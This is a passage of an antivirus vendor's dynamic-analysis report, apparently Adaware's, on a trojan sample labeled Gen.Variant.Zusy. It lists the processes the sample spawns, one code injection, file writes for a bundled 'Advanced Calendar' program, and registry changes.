Gen.Variant.Zusy.178812_5ef2c67ca0 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712

The Trojan injects its code into the following process(es):

Calendar.exe:3428

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process imapi.exe:1932 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)

The process InstallHelper.exe:3084 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)

The process InstallHelper.exe:3480 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)

The process nst6.tmp.exe:2736 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)

The process CalendarServ.exe:3180 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)

The process CalendarServ.exe:3156 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)

The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (27681 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6 (0 bytes)

The process %original file name%.exe:1216 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)

The process setup.exe:1948 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)

The process Calendar.exe:3428 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (340 bytes)

The process 291734.exe:2712 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)

Registry activity

The process imapi.exe:1932 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 D1 1C CB 70 45 7A A0 D0 0B 82 18 85 7F 8C 74"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"ControlFlags" = "1"
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"BitNames" = " ImapiDebugError ImapiDebugWarning ImapiDebugTrace ImapiDebugInfo ImapiDebugX ImapiDebugSort"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"Guid" = "8107d8e9-e323-49f5-bba2-abc35c243dca"

The process InstallHelper.exe:3084 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Control\TimeZoneInformation]
"ActiveTimeBias" = "4294967176"

[HKLM\SOFTWARE\CalendarTool]
"Version" = "2.0.0.11189"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\CalendarTool\INSTALL_MARK]
"Version" = "2.0.0.11189"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"UninstallString" = "%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe -Uninstall English"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\CalendarTool]
"PartnerId" = "YeaPlayer|br|IBD|Bundle"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayIcon" = "%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\CalendarTool]
"INSTALL_FIRST_TIME" = "2016-05-03_04:55:47"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayFullVersion" = "2.0.0.11189"

[HKLM\SOFTWARE\CalendarTool]
"UserId" = "61807c4bafc26bb2ed98e3e60f587cd6"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 5D 7F D0 86 D4 C2 1B B5 7E 30 04 72 D5 B9 A4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\CalendarTool]
"FrID" = "ClwS01UkXONz6DdlNQFq0y97Bu1dKUCqMKc="

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayVersion" = "2.0.0.11189"
"Publisher" = "MEIXIAN XIE"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayName" = "Advanced Calendar 2.0.0.11189"

[HKLM\SOFTWARE\CalendarTool]
"parentName" = "setup.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\CalendarTool\2.0.0.11189]
"install_path" = "%Program Files%\CalendarTool\2.0.0.11189"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level"

The process InstallHelper.exe:3480 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 51 D7 E3 70 D0 78 6F A0 B2 1E 2B 0F 84 47 49"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process nst6.tmp.exe:2736 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 09 35 66 49 82 C4 B6 06 8B 85 05 2C 1E B8 CE"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level"

The process nst6.tmp.exe:2804 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\CalendarTool\QUIT]
"QuitSession" = "{0A3A8827-4F83-49DA-9BB3-1E089656E7AC}-1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 AE 47 DD 19 BB A4 13 6E DE A7 71 AB E9 3B F7"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process CalendarServ.exe:3180 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "11665867"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"CtrlBitMap" = "00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level" = ""

